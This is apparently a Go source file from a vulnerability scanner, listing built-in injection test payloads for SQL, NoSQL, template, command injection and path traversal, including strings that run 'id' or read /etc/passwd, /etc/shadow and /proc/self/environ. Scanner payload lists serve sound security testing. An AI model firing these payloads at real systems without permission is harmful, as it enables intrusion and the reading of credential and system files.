package scanner

// Payloads contains the built-in injection payloads per category.
var Payloads = map[Category][]string{
	CategorySQLi: {
		// Error-based
		`'`,
		`''`,
		`"`,
		`' OR '1'='1`,
		`' OR '1'='1' --`,
		`" OR "1"="1`,
		`1' ORDER BY 1--`,
		`1' UNION SELECT NULL--`,
		`1' UNION SELECT NULL,NULL--`,
		`' AND 1=CONVERT(int,(SELECT @@version))--`,
		`'; WAITFOR DELAY '0:0:5'--`,
		`admin'--`,
		`' OR 1=1#`,
		`' OR 1=1/*`,
		`') OR ('1'='1`,
		`')) OR (('1'='1`,
	},
	CategoryNoSQLi: {
		`{"$gt":""}`,
		`{"$ne":null}`,
		`{"$ne":""}`,
		`{"$regex":".*"}`,
		`{"$where":"1==1"}`,
		`{"$gt":0}`,
		`true, "$or": [{}],"a":"`,
		`", "$or": [{}], "a":"`,
		`' || '1'=='1`,
		`{"$exists":true}`,
	},
	CategorySSTI: {
		`{{7*7}}`,
		`${7*7}`,
		`<%= 7*7 %>`,
		`#{7*7}`,
		`{{''.__class__.__mro__[1].__subclasses__()}}`,
		`{{config}}`,
		`{{self}}`,
		`{%import os%}{{os.popen('id').read()}}`,
		`${{7*7}}`,
		`@(1+1)`,
		`{{constructor.constructor('return 1')()}}`,
	},
	CategoryCommandInject: {
		`; id`,
		`| id`,
		"` id `",
		`$(id)`,
		`; whoami`,
		`| whoami`,
		`&& id`,
		`|| id`,
		`; cat /etc/passwd`,
		`| cat /etc/passwd`,
		`%0aid`,
		`\nid`,
	},
	CategoryPathTraversal: {
		`../../../etc/passwd`,
		`..\..\..\..\windows\win.ini`,
		`....//....//....//etc/passwd`,
		`..%2f..%2f..%2fetc%2fpasswd`,
		`%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd`,
		`..%252f..%252f..%252fetc%252fpasswd`,
		`/etc/passwd`,
		`C:\windows\win.ini`,
		`....//....//....//....//etc/passwd`,
		`/proc/self/environ`,
		`/etc/shadow`,
		`..%c0%af..%c0%af..%c0%afetc/passwd`,
	},
}
